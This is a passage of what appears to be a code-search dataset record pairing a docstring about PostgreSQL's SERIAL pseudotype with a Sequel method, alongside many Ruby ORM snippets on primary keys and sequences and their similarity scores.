adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def reset(sequence_name, value = 0)\n value = 0 if value.to_i <= 0\n value = 1 if value == 0 && UID.configuration.postgres?\n\n diff = []\n diff << uid_current_index(sequence_name)\n\n if UID.configuration.redis?\n $redis.set(sequence_name, value)\n else\n ActiveRecord::Base.connection.select_value(\"ALTER SEQUENCE #{sequence_name} RESTART WITH #{value};\")\n end\n\n diff << uid_current_index(sequence_name)\n diff\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def reset_indecies\n puts 'Resetting AR indecies.'\n ApplicationRecord.connection.tables.each { |t| ApplicationRecord.connection.reset_pk_sequence!(t) }\n puts 'Restore complete'\n end",
"def inititalize\n @id = @@next_table_id\n @@next_table_id += 1\n\n def self.preview_next_id\n @@next_table_id\n end\n end",
"def clear_primary_key\n @attributes[self.primary_key_attribute] = nil\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def getNextSequence(table,db)\n\t\tif db[table].count == 0\n\t\t\treturn 1\n\t\telse\n\t\t\tdb[table].find().sort(_id: -1).limit(1).each do |document|\n\t\t\t\treturn document[:_id]+1\n\t\t\tend\n\t\tend\n\tend",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def assign_tx_seq_num\n self.update(tx_seq_num: Order.max_tx_seq_num + 1) \n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def default_sequence_name(table, _column)\n \"#{table}_seq\"\n end",
"def set_key\n last_key = Issue.find_by_sql('select max(issueId) as maxid from issue')[0].maxid\n self.issueId = last_key.to_i + 1\n end",
"def reset_initial_version\n @initial_version = last_committed_sequence_number\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def primary_key=(key)\n @primary_key = key\n end",
"def next_sequence_id\n last_sequence_id + 1\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key(_table_name)\n []\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def clear_sequence_setup(rep_prefix, table_name)\n sequence_table_name = \"#{rep_prefix}_sequences\"\n if tables.include?(sequence_table_name)\n trigger_name = \"#{rep_prefix}_#{table_name}_sequence\"\n trigger_row = select_one(<<-end_sql)\n select * from information_schema.triggers\n where trigger_schema = database()\n and trigger_name = '#{trigger_name}'\n end_sql\n if trigger_row\n execute \"DROP TRIGGER `#{trigger_name}`\"\n execute \"delete from #{sequence_table_name} where name = '#{table_name}'\"\n unless select_one(\"select * from #{sequence_table_name}\")\n # no more sequences left --> delete sequence table\n drop_table sequence_table_name.to_sym\n end\n end\n end\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def no_primary_key\n clear_setter_methods_cache\n self.simple_pk = @primary_key = nil\n end",
"def no_primary_key\n clear_setter_methods_cache\n self.simple_pk = @primary_key = nil\n end",
"def remove_cached_schema(table)\n tab = quote_schema_table(table)\n Sequel.synchronize do\n @primary_keys.delete(tab)\n end\n super\n end",
"def increment_sequence_number\n @sequence_number += 1\n @sequence_number = 0 if @sequence_number > 0xFFFFFFFF\n end",
"def next_for(table)\n table = table.respond_to?(:table_name) ? table.table_name : table.to_s\n next_id :table => table\n end",
"def _next_id\n @@id -= 1\n @@id\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def set_key\n last_key = User.find_by_sql('select max(userId) as maxid from user')[0].maxid\n self.userId = last_key.to_i + 1\n end",
"def initialize\n \t @id = @@next_table_id\n \t @@next_table_id += 1\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def remove_cached_schema(table)\n tab = quote_schema_table(table)\n Sequel.synchronize do\n @primary_keys.delete(tab)\n @primary_key_sequences.delete(tab)\n end\n super\n end",
"def reset_table_name #:nodoc:\n self.table_name = compute_table_name\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def roomer_reset_table_name\n if @roomer_original_table_name\n self.table_name = \"#{table_name_prefix}#{@roomer_original_table_name}\"\n else\n reset_table_name\n end\n roomer_ensure_table_name_prefix\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def change_sequence(name, options = {})\n execute change_sequence_sql(name, options)\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n @primary_key\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def restrict_primary_key\n clear_setter_methods_cache\n @restrict_primary_key = true\n end",
"def restrict_primary_key\n clear_setter_methods_cache\n @restrict_primary_key = true\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def set_next_seqno\n a = self.pcp_subject.pcp_items\n m = a.maximum( :seqno ) || 0\n n = a.count\n self.seqno = ( n > m ? n : m ) + 1\n end",
"def sequence\n # noop\n @state = :id\n end",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def remove_previous_entries\n Entry.delete_all\n Entry.connection.execute('ALTER TABLE entries AUTO_INCREMENT = 0')\n end",
"def assign_objectid_primary_key\n self.class.objectid_columns_manager.assign_objectid_primary_key(self)\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def primary_key!\n @primary_keys << @name\n end"
] |
[
"0.81005555",
"0.80798966",
"0.80725735",
"0.80469537",
"0.80416894",
"0.7450408",
"0.74204576",
"0.7341868",
"0.72347623",
"0.71692264",
"0.7104913",
"0.7014823",
"0.6871635",
"0.66317236",
"0.66317236",
"0.66184896",
"0.6581778",
"0.65705836",
"0.6544491",
"0.6426742",
"0.64015865",
"0.6363617",
"0.6363617",
"0.636186",
"0.6247724",
"0.61781734",
"0.6140087",
"0.61247116",
"0.6098612",
"0.6098612",
"0.6052866",
"0.6033237",
"0.60322815",
"0.6018139",
"0.5978871",
"0.59276026",
"0.592117",
"0.5900161",
"0.5900161",
"0.5897859",
"0.58775663",
"0.58767766",
"0.5862494",
"0.57891834",
"0.57765937",
"0.5750386",
"0.5735678",
"0.5735471",
"0.5706521",
"0.5684599",
"0.56220126",
"0.56190556",
"0.56006366",
"0.55761045",
"0.55735016",
"0.5563029",
"0.5557394",
"0.5525107",
"0.55217075",
"0.5462961",
"0.54366547",
"0.54366547",
"0.54230314",
"0.5412613",
"0.5411165",
"0.5407255",
"0.5400989",
"0.5386789",
"0.53809726",
"0.5376366",
"0.5346946",
"0.5346946",
"0.5331582",
"0.5296254",
"0.5271805",
"0.5267895",
"0.5267895",
"0.5188494",
"0.5186729",
"0.5149807",
"0.51458836",
"0.51458836",
"0.51458836",
"0.5141115",
"0.51305336",
"0.51276344",
"0.51276344",
"0.5125175",
"0.51199734",
"0.5113754",
"0.51129556",
"0.51000327",
"0.5092949",
"0.50916666",
"0.5082864",
"0.5079728",
"0.5068904",
"0.50622356",
"0.50622356",
"0.5042659"
] |
0.8832561
|
0
|
PostgreSQL uses the SERIAL pseudotype instead of AUTOINCREMENT for managing incrementing primary keys.
|
def serial_primary_key_options
  # Identity columns are used on PostgreSQL 10.2+ (server_version 100002);
  # older servers fall back to the serial pseudotype.
  # :nocov:
  auto_increment_key = server_version >= 100002 ? :identity : :serial
  # :nocov:
  {:primary_key => true, auto_increment_key => true, :type=>Integer}
end
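
For context, a sketch of how these options surface in schema generation; the :widgets table is a hypothetical example, and the exact DDL depends on the server version.

# Sketch: primary_key inside create_table picks up
# serial_primary_key_options, so the generated column follows the server
# version. Assumes DB is a PostgreSQL Sequel::Database.
DB.create_table(:widgets) do
  primary_key :id   # serial on PostgreSQL < 10.2, identity on 10.2+
  String :name
end
# PostgreSQL < 10.2:
#   CREATE TABLE widgets (id serial PRIMARY KEY, name text)
# PostgreSQL >= 10.2:
#   CREATE TABLE widgets (id int GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY, name text)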
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def column_definition_serial(field)\n \"INTEGER PRIMARY KEY AUTOINCREMENT\"\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def serial_primary_key_options\n {:primary_key => true, :serial => true, :type=>Integer}\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def set_sequence(table_name, pk)\n begin\n stmt = @connection.run(\"select max(#{pk}) + 1 from #{table_name}\")\n next_pk_val = stmt.fetch\n stmt.drop\n flds = table_name.split('.')\n @connection.do(\"sequence_set('#{flds[0]}.#{flds[1]}.#{table_name}.#{pk}', #{next_pk_val}, 0)\")\n return true\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n end\n return false\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def reset_primary_key_sequence(table)\n return unless seq = primary_key_sequence(table)\n pk = SQL::Identifier.new(primary_key(table))\n db = self\n s, t = schema_and_table(table)\n table = Sequel.qualify(s, t) if s\n\n if server_version >= 100000\n seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))\n increment_by = :seqincrement\n min_value = :seqmin\n # :nocov:\n else\n seq_ds = metadata_dataset.from(LiteralString.new(seq))\n increment_by = :increment_by\n min_value = :min_value\n # :nocov:\n end\n\n get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def auto_increment_sql\n AUTO_INCREMENT\n end",
"def insert_sequenced(row)\n sql = row.type.insert_sql_minus_key\n vals = row.field_values_minus_key\n#$stderr.puts sql\n#$stderr.puts vals.inspect\n\n db.do(sql, *vals)\n insert_id = db.select_one(row.type.get_insert_id_sql)[0]\n row.send(row.type.primary_key.setter_name, insert_id)\n row.reset_changed\n end",
"def auto_increment_sql\n 'AUTOINCREMENT'\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
"def property_schema_statement(schema)\n statement = super\n statement << ' AUTO_INCREMENT' if supports_serial? && schema[:serial?]\n statement\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def manually_autoincrement_id\n # no idea why this is necessary\n # ActiveRecord::StatementInvalid: PGError: ERROR: null value in column \"ID\" violates not-null constraint\n self.ID = Presto::Post.recent.first.ID.to_i + 1\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def next_sequence_id\n last_sequence_id + 1\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def create_sequence_statement(repository, property)\n \"CREATE SEQUENCE #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def next_val_sequence(name)\n if self.class.to_s =~ /ActiveRecord::ConnectionAdapters::Mysql/\n self.insert_sql(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n else\n # the default insert_sql is nonsense, but jdbc_mysql doesn't override it\n self.execute(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n end\n end",
"def primary_key\n 'id'\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def save_primary_key_grip; end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n super\n\n exec_query('SELECT @@IDENTITY AS id')\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super\n end",
"def insert_sql(sql, name = nil, pri_key = nil, id_value = nil, sequence_name = nil)\n unless pri_key\n table_ref = extract_table_ref_from_insert_sql(sql)\n pri_key = primary_key(table_ref) if table_ref\n end\n\n if pri_key\n select_value(\"#{sql} RETURNING #{quote_column_name(pri_key)}\")\n else\n super\n end\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def reset_sequence_value(name, next_value = nil)\n create_sequence(name)\n unless next_value\n table, field = name.split('_$_')\n next_value = self.select_rows('SELECT MAX(%s) as max FROM %s' % [field, table]).first.first.to_i + 1\n end\n self.execute(\"ALTER TABLE %s_sequence AUTO_INCREMENT = %s\" % [name, next_value || 1])\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n Integer(select_value(\"SELECT currval('#{sequence_name}')\"))\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
